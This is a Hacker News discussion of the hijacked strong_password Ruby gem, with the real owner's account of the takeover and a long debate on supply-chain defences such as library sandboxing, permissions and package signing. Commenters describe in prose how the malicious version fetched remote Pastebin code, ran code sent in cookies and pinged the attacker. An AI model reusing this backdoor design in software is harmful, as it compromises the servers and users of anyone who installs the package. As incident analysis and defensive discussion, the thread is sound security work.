Strong_password Rubygem hijacked (withatwist.dev)
625 points by jrochkind1 on July 7, 2019 | 128 comments

Hi all. I'm the (actual) owner of that gem.

As already hypothesized in the comments, I'm pretty sure this was a simple account hijack. The kickball user likely cracked an old password of mine, from before I was using 1password, that was leaked in who knows which of the various breaches that have occurred over the years.

I released that gem years ago and barely remembered even having a rubygems account since I'm not doing much OSS work these days. As a result, I simply forgot to rotate out that old password there, which is definitely my bad.

Since being notified and regaining ownership of the gem I've:

1. Removed the kickball gem owner. I don't know why rubygems did not do this automatically but they did not.

2. Reset to a new strong password specific to rubygems.org (haha) with 1password and secured my account with MFA.

3. Released a new version 0.0.8 of the gem so that anyone that unfortunately installed the bogus/yanked 0.0.7 version will hopefully update to the new/real version of the gem.

One more reason to use a password manager and have unique passwords.

Thanks for sharing the info!

This is a gem that checks the strength of a user-submitted password. It has a large number of downloads (37,000 on the legitimate 0.0.6 version). It looks like it's made to be integrated on webservers.

The modified gem downloaded and executed code stored in an editable Pastebin, meaning that the code could have changed at any time. Presumably, the malicious code would activate just by browsing any page on the affected site. One version of the Pastebin code would execute any code embedded in a magic cookie sent by a client. Plus, it would ping the attacker's server to let them know your webserver was infected.

Nasty, nasty stuff.

Good analysis, but I'm not sure about "a large number of downloads". Download counts can be pretty inflated due to CI/deployment processes that reinstall gems from scratch repeatedly. I've seen open-sourced gems that never got any real usage outside their original company get that number of downloads.

To add a bit of a sense of scale here, the popular Devise gem that's used for authentication in many Rails apps has 52.7 million total downloads and almost 20k stars on GitHub. strong_password has 247k total downloads and 191 stars. It has three reverse dependencies, none of which I've ever heard of and none of which have any of their own reverse dependencies.

This suggests to me that this gem is used by less than 1% of Ruby web apps (probably substantially less) and, more importantly, if you have a dependency on this gem you probably know (because it'd be a direct dependency in your Gemfile, not a dependency of a dependency).

So...we can all ignore how a popular ruby gem was hijacked and used to infect production webservers with malware because (to paraphrase) "it wasn't that popular"?

This was caught because the author diligently checked their dependencies line by line. How many ruby devs do that?

How many other gems are already hijacked but haven't been discovered because no-one has audited them? That number is almost certainly non-zero.

This is on Rubygems.org. They have enough information to warn devs that the gem might be infected (months since the maintainer logged in, gem version release without github repo changes, maintainer email on haveIbeenpwned and no password change since that date, etc).
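
A rough sketch of how the signals listed above could be combined into warnings. The field names, the 180-day dormancy threshold, and the idea that a registry stores these facts per release are all assumptions made for illustration; nothing here reflects how Rubygems.org actually works.

```python
from dataclasses import dataclass
from datetime import date
from typing import List, Optional


@dataclass
class ReleaseSignals:
    """Hypothetical per-release facts a registry could collect."""
    release_date: date
    last_maintainer_login: date           # last login before this release
    repo_changed_since_last_release: bool
    email_breach_date: Optional[date]     # None if the email is in no known breach
    last_password_change: date


def risk_flags(s: ReleaseSignals, dormant_days: int = 180) -> List[str]:
    """Return human-readable warnings; an empty list means nothing looked odd."""
    flags = []
    if (s.release_date - s.last_maintainer_login).days > dormant_days:
        flags.append("maintainer was dormant before this release")
    if not s.repo_changed_since_last_release:
        flags.append("new version published without source repo changes")
    if s.email_breach_date and s.last_password_change < s.email_breach_date:
        flags.append("password not changed since a known breach")
    return flags
```

None of these flags proves a hijack; they would only tell a human where to look first.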

No, I didn't say that, and I would prefer that you not put words in my mouth. I was responding to a single statement in the parent comment that I thought was inaccurate.

> a [...] ruby gem was hijacked and used to infect production webservers with malware

I wasn't aware of any reports of this being exploited in production. Do you have an example?

I agree with the rest of your comment about the need for more active measures on the part of Rubygems.org and the likelihood that other gems -- especially infrequently used, semi-abandoned ones like this -- have been hijacked without anyone detecting.

fair point, sorry for the implied accusation.

no, I don't have any examples, but then, it's not likely we're going to hear of any - anyone affected is probably unaware (until now, maybe). I guess some might come out of the woodwork now.

But again, Rubygems should have data on who downloaded this version of this gem, and so should be able to warn them, and even publish that data so we know not to visit their sites until they acknowledge and fix.

> This is a gem that checks the strength of a user-submitted password

Does it, though?


Indeed, replacing this with the list of top 100 passwords would be much more effective.

Or, alternatively, switching to the haveibeenpwned API[1] or zxcvbn[2].

[1]: https://haveibeenpwned.com/API/v2 [2]: https://github.com/dropbox/zxcvbn
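
For the haveibeenpwned option, a minimal sketch of a k-anonymity lookup: only the first five hex characters of the password's SHA-1 hash leave the machine, and the comparison against the returned suffixes happens locally. The endpoint URL and the `SUFFIX:COUNT` response format are my understanding of the Pwned Passwords range service, so check the current API documentation before relying on them; `fetch_range` and `breach_count` are names invented here.

```python
import hashlib
import urllib.request
from typing import Callable


def fetch_range(prefix: str) -> str:
    """Fetch all known hash suffixes for a 5-character SHA-1 prefix."""
    url = "https://api.pwnedpasswords.com/range/" + prefix
    with urllib.request.urlopen(url, timeout=10) as resp:
        return resp.read().decode("utf-8")


def breach_count(password: str, fetch: Callable[[str], str] = fetch_range) -> int:
    """Return how often the password appears in the breach corpus (0 if absent)."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    prefix, suffix = digest[:5], digest[5:]
    # Each response line is expected to look like "<35 hex chars>:<count>".
    for line in fetch(prefix).splitlines():
        candidate, _, count = line.partition(":")
        if candidate.strip().upper() == suffix:
            return int(count)
    return 0
```

Passing `fetch` as a parameter keeps the hashing and matching logic testable without network access.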

It seems to do that too (comparing against a list of the top 500 passwords):


A long time ago I made a gem that does pretty much this: https://github.com/senorprogrammer/pil

If you want this functionality, I recommend not using it as-is, given the security vuln GitHub is currently reporting. Rather, anyone has my permission to copy the code verbatim into your project. It's a pretty simple gem.

Could you clarify?

Is the algorithm deficient?

To me that looks like code that indeed checks the strength, so I must be missing something.

It checks the length of a password, along with an arbitrary scalar for repeated characters. It does not do any entropy calculations.
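
To make the contrast concrete, here is a sketch of what a naive entropy estimate plus a denylist could look like. This is not the gem's code; the four-entry denylist, the 50-bit threshold, and the function names are all illustrative assumptions. The estimate is only an upper bound (it assumes every character is chosen independently), which is why pattern-aware estimators like zxcvbn exist.

```python
import math
import string

# Tiny illustrative denylist; a real one would hold hundreds or thousands of entries.
COMMON = {"password", "123456", "qwerty", "letmein"}


def naive_entropy_bits(password: str) -> float:
    """Upper-bound estimate: length * log2(size of the character pool in use)."""
    pool = 0
    if any(c in string.ascii_lowercase for c in password):
        pool += 26
    if any(c in string.ascii_uppercase for c in password):
        pool += 26
    if any(c in string.digits for c in password):
        pool += 10
    if any(c in string.punctuation for c in password):
        pool += len(string.punctuation)
    if pool == 0:
        # Only spaces or non-ASCII characters: this sketch does not model them.
        return 0.0
    return len(password) * math.log2(pool)


def is_weak(password: str, min_bits: float = 50.0) -> bool:
    """Weak if it is on the denylist or falls below the entropy threshold."""
    return password.lower() in COMMON or naive_entropy_bits(password) < min_bits
```

Note that a string of one repeated letter still scores well on length alone, so a check like this needs a repetition penalty or a pattern matcher on top.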

The writer of that code at least needs to read https://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpubli... one more time.

And, only in "production" mode. >:-\

The unanswered question is still how this `kickball` account gained control of the gem.

> The gem seems to have been pulled out from under me… When I login to rubygems.org I don’t seem to have ownership now. Bogus 0.0.7 release was created 6/25/2019.

The way I see it, there are a few options:

1. The rubygem was transferred by rubygems.org staff to this account.

2. The maintainer's account was hijacked and then it was transferred, and could even still be compromised.

3. There is some issue or attack vector with the rubygem system that allowed the attacker to gain control.

Any guesses?

Option 2 is overwhelmingly likely, IMO. Phishing, password reuse, credential scraping/spamming, and plain old brute force are unbelievably common.

That said, the other two options bear investigation too. Just don't spend time looking for a cold breeze from an un-caulked window frame when the screen door is open.

The true irony, of course, is that the package in question is designed (whether it does or not isn't the point, though I guess if it isn't very good then this becomes all the more humorous) to help prevent people from reusing common passwords or choosing passwords that are easy to brute force ;P... clearly the author should have used this package to select their password that protected the uploads of this package.

We don't know that. Their system could've been compromised in some other way and the password captured.

Yes. I think that we need to see a full security report from rubygems.org on this. This could be bigger than just the one package.

Agreed – a postmortem from rubygems.org on how the takeover occurred, and would be prevented next time, is something the Ruby community should expect/demand.

Do you feel that anyone in the community who isn't contributing financially or with their time to the project should expect to be able to "demand" anything from Ruby gems?

The lack of funding for foundational parts of many popular ecosystems (e.g. NPM, PyPI, Rubygems) never ceases to surprise me.

We've heard this before. Yes. Developers using this may decide not to use this gem. Ruby gems in general may lose trust.

If the goal of the project is adoption, then do not ignore that group.

so you feel that a group of volunteers with limited funding should do what precisely?

as to losing adoption, that would only happen if

a) there were other options with better security, and given that npm, PyPI and others have had similar problems, there probably aren't

b) Developers would actually move ecosystem due to package manager weaknesses. given that hasn't happened with any of the previous instances of supply chain attacks (and this has been going on for 5+ years now) I don't think so.

As one example, rubygems was compromised in 2013 (https://news.ycombinator.com/item?id=5139583). Did you or anyone else stop using it as a result?

rubygems is actually given some funding by Ruby Together, I'm not sure with what current budget. https://rubytogether.org/

based on their home page they're somewhere near the lower end of the $20k-$35k category for all funding...

I think that is per month? But not sure.

Think you could be right there, so not a tiny amount of cash but looking at their page not even enough to have a full time dev on the gem tools...

Obv. as a security person I'd say they should prioritise security things like audits and improved authentication requirements for gem owners, but realistically it sounds like just keeping the lights on is pretty expensive.

They work on adding other features to rubygems and other things they fund. If I were them, I would work on nothing but security of rubygems.org gem releases.

Yet another example of supply chain attacks. How businesses seriously allow their devs to pull code from outside sources blows my mind. Npm, Ruby gems, etc etc etc.


4. The maintainer of the gem is complicit in the attack, and transferred ownership voluntarily.

Yes, we all remember Dominic Tarr's event-stream handover to an anonymous hacker because maintaining it "wasn't fun anymore" https://gist.github.com/dominictarr/9fd9c1024c94592bc7268d36...

That's an extremely ungenerous interpretation of those events. He shouldn't have handed over control of the package to someone he barely knew, but from his perspective, it was that or let the package die. He volunteered his time, he had no kind of obligation to continue if he didn't want to. His actions were certainly not malicious, and he was clearly not "complicit" with the hacker, which is what you're implying.

That incident highlighted a broadly systemic problem with how these kinds of packages are maintained, it was not a case of "one bad maintainer".

I was referring more to the "transferred ownership voluntarily" part, not to the complicit part, so no, I'm not implying that.

But it is really interesting to see the atmosphere around this systemic problem. Maintainers don't realize that transferring ownership can be putting users in danger, they'd rather transfer the ownership to a random stranger than mark the package abandoned, then they deny it was ever so serious and ask for more money, and their friends and followers rise up to protect them, without ever addressing the central issue, yeah, that's a systemic problem.

Oh come on, you're still giving this guy shit for making a mistake while spending his free time developing it?

Well he still didn't admit it was a bad move, putting other people in danger. If it's abandoned, mark it abandoned, let others fork it. So simple.

Not sure why someone with malicious intent would use their rubygems superpower just to compromise a low profile gem like this. Perhaps it is a targeted attack at a certain website which may now be compromised and we are just seeing the tip of the iceberg.

Option 1 was referring to the attacker tricking a staff member into handing control to them. Maybe by claiming it's abandoned?

My bet goes to #3. After [0]this commit, everything is possible in Ruby world.


That seems to demonstrate a github vulnerability, rather than anything ruby-specific?

It was a Rails vulnerability (mass assignment) that the attacker used to accomplish this. It’s long since been fixed and doesn’t demonstrate an inherent security flaw with the “ruby world.”


We need a sort of capability and permission method for libraries.

For example a "strong_password" library should only be given "CPU compute" permissions, no I/O.

But even with this, the problem will be like what we see on phones: popular libraries will require all the permissions.

You'll want to install React, and React + its 100 dependencies will request everything.

To be honest, even the coarsest-possible permissions of "can do I/O" vs. "can't do I/O" would be exceedingly effective at stymieing these sorts of attacks; all malicious software of this sort needs to do I/O at some point, and relatively few libraries actually have a good excuse to do I/O (though logging might be thorny).

That said it seems easier said than done to impose those sorts of restrictions on a per-dependency basis. Attempts to statically verify the absence of I/O sound like a great game of whack-a-mole, and I don't know how you'd do it dynamically without running all non-I/O dependencies in an entirely separate process from the main program.

> few libraries actually have a good excuse to do I/O (though logging might be thorny).

Yeah, logging would be tricky...

Maybe a "logging" capability could be created. Separated from other I/O.

Such a capability would be weird, and nonstandard, and messy, cutting across several abstraction layers. But if pulled off, it might be worth the effort.

That's solved in similar frameworks by separating open and read/write. You open (or inherit from somewhere) a logging socket, drop the open privileges, retain the permission to write to the log socket.
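
The shape of that idea, sketched in an object-capability style: the application opens the log once and hands the library a callable that can only append lines, never `open` or a path. `make_log_capability` and `check_password` are hypothetical names. Plain Python does not enforce this (a closure can be introspected), so treat it as an illustration of the interface; real enforcement would need OS support such as dropping the ability to open new files.

```python
import io
from typing import Callable


def make_log_capability(stream: io.TextIOBase) -> Callable[[str], None]:
    """Wrap an already-open stream so the holder can append lines and nothing else."""
    def log(message: str) -> None:
        stream.write(message.rstrip("\n") + "\n")
    return log


def check_password(password: str, log: Callable[[str], None]) -> bool:
    """Hypothetical library function: it receives `log`, never `open` or a path."""
    ok = len(password) >= 12
    log("password check passed" if ok else "password check failed")
    return ok
```

The caller decides where the log goes (file, socket, in-memory buffer); the library only ever sees the write side.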

This discussion is basically inventing a per-library pledge(2).

or apparmor, selinux, grsec, tomoyo, ... But those systems can't integrate into scripting language per-library use case without some serious thread / IPC overhead.

These others can achieve what's intended, but the entire flavour of the discussion is a dead ringer for pledge's purpose and interface, which is much simpler and very much internal to the software (a self-check of sorts).

Haskell indirectly solves this by separating `trace` (a form of logging) from IO (trace is a procedure that logs function calls, while all other IO must be contained in the IO monad).

> That said it seems easier said than done to impose those sorts of restrictions on a per-dependency basis.

Isn't this the sort of thing type inference is made for? Along with return types, functions have an io type if they're marked (std lib) or if they contain a marked function. Otherwise they have the pure type.
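
The propagation rule described here (a function is "io" if it is marked or calls something that is) amounts to a fixed-point computation over the call graph. A small sketch, assuming the call graph has already been extracted somehow; the function names in the usage note are made up.

```python
from typing import Dict, Set


def infer_io(calls: Dict[str, Set[str]], marked_io: Set[str]) -> Set[str]:
    """Return every function that is marked as I/O or can reach one through calls."""
    io_funcs = set(marked_io)
    changed = True
    while changed:  # iterate to a fixed point so recursion and cycles are handled
        changed = False
        for func, callees in calls.items():
            if func not in io_funcs and callees & io_funcs:
                io_funcs.add(func)
                changed = True
    return io_funcs
```

With `calls = {"check": {"strength", "phone_home"}, "phone_home": {"http_get"}, "strength": set()}` and `http_get` marked, both `phone_home` and `check` come out as I/O while `strength` stays pure. The hard part in a dynamic language is building an accurate call graph in the first place.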

Doing this usefully does require more than just “does IO” — e.g. does that mean it can load another module, read a list of too-common passwords, write to a log file, or read your ~/.aws/credentials? Similarly, does allowing networking mean it can talk to anything or just a few well-known hostnames and ports?

This isn’t to say that it’s a bad idea but there are a ton of details which get annoying fast. I know the Rust community was looking into the options after the last NPM hijack was in the news but it sounded like it’d take years to make it meaningfully better.

If you're running Haskell. Few other languages can do it.

> running all non-I/O dependencies in an entirely separate process from the main program.

Maybe that's not such a bad idea. This "strong_password" thing is written in Ruby, a few milliseconds delay is probably not noticeable anyway and vastly preferable given the security implications.
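
A sketch of what that process boundary could look like: the untrusted scoring code runs in its own interpreter and talks to the main program only through stdin and stdout. The scoring rule inside `WORKER` is a placeholder, and `score_in_subprocess` is a made-up name. A separate process alone does not stop the child from doing I/O; that would still need an OS-level sandbox around it.

```python
import json
import subprocess
import sys

# Worker source: reads one JSON request from stdin, writes one JSON reply to stdout.
# The scoring rule is a stand-in for whatever the untrusted library computes.
WORKER = r"""
import json, sys
request = json.load(sys.stdin)
password = request["password"]
score = len(set(password)) * len(password)
json.dump({"score": score}, sys.stdout)
"""


def score_in_subprocess(password: str, timeout: float = 5.0) -> int:
    """Run the scoring code in a separate interpreter and return its result."""
    proc = subprocess.run(
        [sys.executable, "-I", "-c", WORKER],   # -I: isolated mode, ignores user site and env vars
        input=json.dumps({"password": password}),  # sent over stdin, not argv
        capture_output=True,
        text=True,
        timeout=timeout,
        check=True,
    )
    return json.loads(proc.stdout)["score"]
```

Spawning an interpreter per call costs far more than a few milliseconds; a long-lived worker reading requests in a loop would be the more realistic design.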

particularly in ruby where your code can pretty much redefine anything anywhere else in the code whenever it wants.

A whole lot of security is playing whack-a-mole at the end of the day.

The design of macOS and iOS has been moving this way. Many of Apple's first-party applications and frameworks have been broken down into backend "XPC services" that (attempt to) follow the principle of least privilege[1]. Each service runs in a separate process, the system enforcing memory isolation and limiting access to resources (sandboxing).

It's a good idea on paper, but has caveats. Every service is responsible for properly authenticating its clients, and needs to be designed so that a compromised client cannot leverage its access to a service to elevate privileges. Sandboxes are difficult to retrofit onto existing programs. The earlier, lowest-common-denominator system frameworks were not originally written with sandboxing in mind. There are numerous performance drawbacks.

For Apple ecosystem developers, XPC services are also how "extensions" for VPN, Safari ad blockers, etc. are written, for a mix of security and stability benefits.

Though funnily enough, as Apple has pursued these technologies, many HN commenters have decried the walls of the garden closing in.

1: https://en.wikipedia.org/wiki/Principle_of_least_privilege

Hm, interesting. One way to solve this would be to have a language with a very rigid import system - it should be _impossible_ for a library to use a module it hasn't imported, even if that module has been loaded elsewhere in a process. This is probably harder than it looks, and many languages have introspection features that are incompatible with this goal.

With a rigid import system, each library would be forced to declare what it's going to import (including any system libraries), and then you could e.g. enforce a warning + confirmation any time an updated dependency changes its import list.

It doesn't prevent you from getting owned by a modified privileged library, but it's better than the current case. Unfortunately, it probably requires some language (re-)design to fully implement this approach.
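
As a rough illustration of the "warn when the import list changes" step, here is a sketch that diffs the statically visible imports of two versions of a module. It uses Python's `ast` module on Python source purely as an example; it is not a Ruby tool, and it deliberately misses dynamic imports (`__import__`, `importlib`, `eval`), which is exactly the introspection problem mentioned above.

```python
import ast
from typing import Set


def imported_modules(source: str) -> Set[str]:
    """Collect top-level module names from import statements in Python source."""
    modules = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            modules.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            # level == 0 skips relative imports, which stay inside the package
            modules.add(node.module.split(".")[0])
    return modules


def new_imports(old_source: str, new_source: str) -> Set[str]:
    """Modules the new version imports that the old version did not."""
    return imported_modules(new_source) - imported_modules(old_source)
```

A package manager could refuse an automatic upgrade whenever `new_imports` is non-empty and ask for confirmation instead.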

> With a rigid import system, each library would be forced to declare what it's going to import (including any system libraries), and then you could e.g. enforce a warning + confirmation any time an updated dependency changes its import list.

Which means you would get warnings on pretty much any functional upgrade of most dependencies, which would make the whole system useless from a security point of view.

In theory, a point release of a library really shouldn’t be requiring new permissions, and you shouldn’t be randomly upgrading your code to newer major versions without checking for compatibility anyway.

Why should a functional upgrade of a dependency introduce new dependencies anyway? A library that sets out to do a particular thing shouldn’t grow new features that require new capabilities willy-nilly.

> Why should a functional upgrade of a dependency introduce new dependencies anyway? A library that sets out to do a particular thing shouldn’t grow new features that require new capabilities willy-nilly.

Why not? I've often done upgrades with the sole purpose of replacing questionable, hand-written code with external dependencies I've discovered that do the same thing, but better (more features, more tests, more eyes on the code, more fixed issue reports than my often-closed-source code). From string parsing to networking, this happens a lot. The external contracts of my libraries don't change a bit, so why waste a major version? "I'm using someone else's code instead of what I YOLO'd myself" seems like a poor reason to rev a package version--and even if it's not, where do you draw the line? Cribbing code from StackOverflow?

this reminds me of the Boeing 737 MAX8...

> Hm, interesting. One way to solve this would be to have a language with a very rigid import system - it should be _impossible_ for a library to use a module it hasn't imported, even if that module has been loaded elsewhere in a process. This is probably harder than it looks, and many languages have introspection features that are incompatible with this goal.

This _should_ be achievable with Go.

If you look at dependencies as black-boxes that contain their own transitive dependencies, then sure, any given "root-level" dependency of sufficient complexity might end up requesting every permission.

On the other hand, if each dependency in the deps tree had its own required permissions, and you had to grant those permissions to that specific dependency rather than to the rootmost branch of the deps tree that contained it, then things would be a lot nicer. The more fine-grained library authors were in splitting out dependencies, the clearer the permissions situation would be; it'd be clear that e.g. a "left-pad" package way down in the tree wouldn't need any system access.

On the other hand, it'd make sense if dependencies could only add new transitive dependencies during "version update due to automatic version-constraint re-evaluation" if the computed transitive closure of the required permissions didn't increase. Otherwise it'd stop and ask you whether you wanted to authorize the addition of a dep that now asked for these additional permissions.
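
The "did the transitive closure of permissions grow?" check can be sketched in a few lines. The data model (a dict of direct dependencies and a dict of per-package permissions) and the permission names are assumptions for illustration; no existing package manager is being described.

```python
from typing import Dict, Set, Tuple

Deps = Dict[str, Set[str]]    # package -> direct dependencies
Perms = Dict[str, Set[str]]   # package -> permissions it requests for itself


def closure_permissions(root: str, deps: Deps, perms: Perms) -> Set[str]:
    """Union of permissions requested by root and everything reachable from it."""
    seen, stack, total = set(), [root], set()
    while stack:
        pkg = stack.pop()
        if pkg in seen:
            continue
        seen.add(pkg)
        total |= perms.get(pkg, set())
        stack.extend(deps.get(pkg, set()))
    return total


def added_permissions(root: str, old: Tuple[Deps, Perms], new: Tuple[Deps, Perms]) -> Set[str]:
    """Permissions in the closure after an update that were absent before."""
    return closure_permissions(root, *new) - closure_permissions(root, *old)
```

An empty result would let the update through silently; anything else would stop and ask. One weakness: if the root already holds a broad permission, a dependency quietly acquiring the same one does not change the closure, so per-package grants still matter.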

It's also worth noting that under this system, if you trust a large library like React, but don't trust its dependencies, you might still trust that React is sandboxing its own imports correctly -- and then you could "inherit" React's permissions and be fine without overriding anything.

If you're really worried, then you still could go over your entire tree and override the default settings. But there's nothing that would mean you would be required to do that.

People are thinking about this using the phone/website model, where permissions are only applied at one level. With dependencies, whatever giant framework that you're pulling in could be using the same permissions system to secure its own dependencies, which would make you significantly safer.

Under the current system, you have to hope that none of the authors in your dependency chain make a mistake and get compromised. If everybody can sandbox anything, then you only have to hope that most of those authors don't make a mistake.

If somebody attaches malware to a dependency of a dependency, and if even one person along that chain is following best practices and saying, "yeah, I don't think this needs a special permission", then they've likely just prevented that attack from affecting anyone else deeper down the dependency chain.

Sandboxing in package managers is something that could actually scale pretty well; much better than it does for websites/phones/computers.

That seems like a strategy that would cause significant slowdowns and hassles in development.

High-level (i.e. consuming a lot of dependencies at a lot of levels) tools would simply apply an "allow everything" dependency policy rather than deal with tons of issue reports from people who wanted to import the high-level library in a less-than-root-permissioned project.

Additionally, lots of upgrades do increase the dependency surface. Resolving local usernames is a pretty fundamental thing a lot of dependencies would need. Now consider the libc switch from resolving names via /etc/passwd to resolving from multiple sources (including nslcd, a network/local-network service). If every dependency up the tree adopted a "lowest possible needed IO surface" permission model and then that change happened, there would be hell to pay: maintainers would take the shortest path and open up too many permissions; maintainers wouldn't upgrade and leave some packages trapped in a no-man's-land; or maintainers would give up on pulling in prone-to-changing-permissions dependencies, leading to even more fragmentation.

This idea is baked into the core of Deno. See, for example, https://deno.land/manual.html#permissionswhitelist.

Safe Haskell, a GHC extension, is one example in this space. https://downloads.haskell.org/~ghc/latest/docs/html/users_gu...

Its biggest selling point is that a lot of capability safety could be inferred in packages without the package author separately specifying capabilities.

The basic idea is to disallow the remaining impure escape hatches in Haskell in most code, requiring library authors of libraries that do require those escape hatches (e.g. wrappers around C libraries) to assert that their library is trustworthy, and requiring users to accept that trustworthy declaration in a per-user database.

It actually was very promising because the general coding conventions within Haskell libraries made most of them automatically safe, so the set of packages you needed to manually verify wasn't insane (but still unfortunately not a trivial burden, especially if your packages relied on a lot of C FFI).

Unfortunately I have yet to see it used in any commercial projects and it seems in general not to get as much attention as some other GHC extensions.

I know this is about ruby, but it's worth noting that this kind of thing would be solved by effect systems, e.g. Haskell's IO type. If IO isn't part of the signature, you know it's cpu only. Furthermore, you can get more specific such as having a DB type to indicate some code only has access to databases rather than the internet as a whole.

I think you'd also need to prevent things like unsafePerformIO, and equivalent loopholes.

While that might be true, you are not going to switch the world to program in Haskell.

We need a solution which also works for most used languages, JS/C++/Java/Python..., which suggests that it should be done at a higher level, maybe with OS involvement somehow.

Java actually has a pretty useful and powerful SecurityManager concept that nearly no one uses :/

Ruby itself did have something akin to this known as SAFE levels, which prevented IO, exiting the program, etc: https://ruby-hacking-guide.github.io/security.html

Unfortunately, it seems like it's been removed since Ruby 2.1: https://bugs.ruby-lang.org/issues/8468

The shame is that they would have played nicely with the upcoming "guilds" stuff, IMHO.

The .NET Framework 1.0 included "Code Access Security", which included mechanisms to authenticate code with "evidence" (as opposed to traditional 'roles') and then apply permissions similar to your example: DnsPermission, FileIOPermission, RegistryPermission, UIPermission, and so on.

Unfortunately, the architecture was too complex for most developers and fell by the wayside. It was finally removed from the 4.0 Framework after being deprecated for some time.





So, we need a version of pledge from OpenBSD that can surround components / classes: https://man.openbsd.org/pledge.2 and https://www.youtube.com/watch?v=bXO6nelFt-E

Linux has seccomp for the same purpose. The most restrictive mode of seccomp permits only read, write, exit and sigreturn, which is good for a jailed CPU-only process (read/write commands from a pipe and exit when done - no opening new files or sockets).

There is a bunch of work going on for this in JavaScript; see https://www.infoq.com/news/2019/06/making-npm-install-safe/ for links.

Couldn't you theoretically shove all of your untrusted "non-I/O" libraries into a Service Worker? They wouldn't have direct access to the DOM or network I/O that way. It would involve writing some glue code, but perhaps it's worth trading that off for increased "security" (trust)?

EDIT: never mind, looks like I was mistaken about the network i/o part of this... Might be interesting to have a browser-level "sandboxed service worker" for this purpose though...

The skeptic in me thinks that it's never going to work in practice due to 'worse is better': Any system with the 'I/O vs no-I/O' system will have more friction than one without it, and there is no measurable benefit until you get hacked, so most people will not use it (or declare everything as I/O).

That is a brilliant idea. I'm surprised I haven't heard/thought of that yet.

we can't retrofit this onto an existing community and code base... see Python 3 for details. People just won't make extensive changes to their code base if they can't see an immediate, tangible benefit.

For some languages it might be possible to enforce this with just a simple linter

In light of vulnerabilities like these, I’m glad there are developers who spend time making their apps more secure, and thus making us all aware that issues like these are out there. Security is almost always put off in exchange for features, and most of the time it is taken for granted. It’s about time that we start taking it seriously.

Kudos to you!

It seems to me like the only way to really provide any sense of security is to force gems uploaded to RubyGems to be signed. There is some discussion here (https://github.com/rubygems/guides/pull/70) about why the Rubygems PGP CA isn't really worth using in its current state. As we've seen with Javascript dependencies, we can only put off dealing with this problem for so long.

Just as an experiment, I want everyone on this thread to think back to the last time you connected over SSH to a new computer on a company network. Did you check to make sure that the key that popped up was correct, or did you just hit accept?

This is why signing packages will not be a silver bullet that significantly reduces these kinds of attacks. Devs will still have their keys compromised, users will still ignore warnings that keys have changed. It's worth doing, but I am skeptical that it will eliminate these attacks.

In the Javascript world, we got malware recently that was the result of a dev voluntarily giving control of a package to another person. Signing isn't going to help with that.

My vote is on permissions and sandboxing. I think that sandboxing scales reasonably well since it can be applied to dependencies of dependencies all the way down your entire chain. I think that (unlike with phones) most dependencies don't require stuff like File I/O or Networking, which would eliminate a large number of attacks.

And importantly, I think that sandboxing acknowledges that trust is not binary. The big problem with signing packages is that it's following this outdated model of, "well, you'll either trust a package completely or you won't." The reality is that there are packages and package authors that you trust to different degrees and in different contexts. Many buildings have locks inside of them as well as outside, because trusting someone enough to come into your office is not the same as trusting them to root through all of your filing cabinets.

I don't think efforts around verifying authors/updates are useless, but they do often fail to take this principle into account.

>Did you check to make sure that the key that popped up was correct, or did you just hit accept?

But if you had the key cached, and it changed, you’d probably freak out.

>This is why signing packages will not be a silver bullet that significantly reduces these kinds of attacks.

You’ve just isolated the impact of these attacks to new installs, how is that not significant?
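
The trust-on-first-use behaviour being argued about can be sketched as a small pin store. `check_pin` and `KeyChangedError` are names invented for this example, and fingerprints are treated as opaque strings; how a real package manager would obtain and verify them is out of scope.

```python
from typing import Dict


class KeyChangedError(Exception):
    """Raised when a publisher's key differs from the one pinned earlier."""


def check_pin(pins: Dict[str, str], package: str, fingerprint: str) -> bool:
    """Trust on first use: pin unseen packages, reject changed fingerprints.

    Returns True if the package was pinned just now, False if it matched an existing pin.
    """
    known = pins.get(package)
    if known is None:
        pins[package] = fingerprint   # first install: nothing to compare against
        return True
    if known != fingerprint:
        raise KeyChangedError(f"{package}: expected {known}, got {fingerprint}")
    return False
```

The sketch shows both sides of the argument: an existing pin catches a swapped key, but the first install accepts whatever it is given, and a fresh machine or a wiped cache is a first install again.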

> But if you had the key cached, and it changed, you’d probably freak out.

Not in the servers-as-cattle age. By default, a rebuilt server will have a new key. Otherwise, you'd have to save the server SSH key in your configuration/build files, and then you've moved what you have to protect to the source control of the servers, and probably exposed that secret key to many more people and developers than you would have done by leaving the key on the server.

Jumping one stratum forward, with hosted k8s you don't even know the host's key; you do everything via HTTPS and the almost globally accepted list of secure CAs.

Don’t you just use your own SSH CA when you scale up?

Okay, followup question -- when was the last time anyone saw the key change and actually did freak out?

If you're using VMs, keys change all the time. Maybe some people here are good about security and would freak out, but I'm thinking about workplaces I've been at, and that's not a typical attitude for developers that I know. If I set up a VM at work and changed the keys on it, I doubt my coworkers would even ask me about it when they saw the warning.

And I'm literally right there -- they're not going to file a Github issue for a developer they've never met asking why the key changed and then stop working until they get a response.

To push the point even more, how many people on here actually wrote down the SSH fingerprint that they got the first time they connected to a remote machine? When you got a new laptop, did you transfer the keys over, or did you just blindly reconnect to every VM again?

Package managers are meant to help you manage installs on multiple machines, so it's not just the first time you use a package -- it's every time you do a fresh clone of the repository, it's every time you throw away your cache and do a new reinstall over the network.

And it's based on this idea that even when doing an update, package managers and developers won't just blindly hit OK if they get a notification that a key changed, which I just don't think is the norm, even in technical circles.

>Okay, followup question -- when was the last time anyone saw the key change and actually did freak out?

Less than a week ago, a server of mine rebooted due to an unannounced power outage. This particular server just stores some backups and didn’t have proper monitoring, I didn’t know it had rebooted. Normally mere unannounced power outages have me shitting bricks, switching hosts or at least extensively verifying the pre-boot environment.

Trying to SSH into the box I received the host key mismatch error because the server boots into dropbear for LUKS. It took me a few minutes to figure out what had happened, but until I did, I definitely fully assumed that my host was up to something really bad.

> Okay, followup question -- when was the last time anyone saw the key change and actually did freak out?

Every time. Well, "freak out" is a strong phrase. But I do check with a knowledgeable member of the team before continuing.

Another solution would be changing the ecosystem to no longer be reliant on so many third party dependencies.

For instance if I am using Java and I build my web app with only Spring Framework, I can have a lot more confidence that one of my JARs hasn’t been backdoored than I can in an ecosystem where it’s regularly the practice to pull 100s of dependencies from different individual FOSS developers, where it’s difficult to audit the process that each library author is using to secure their package manager upload credentials.

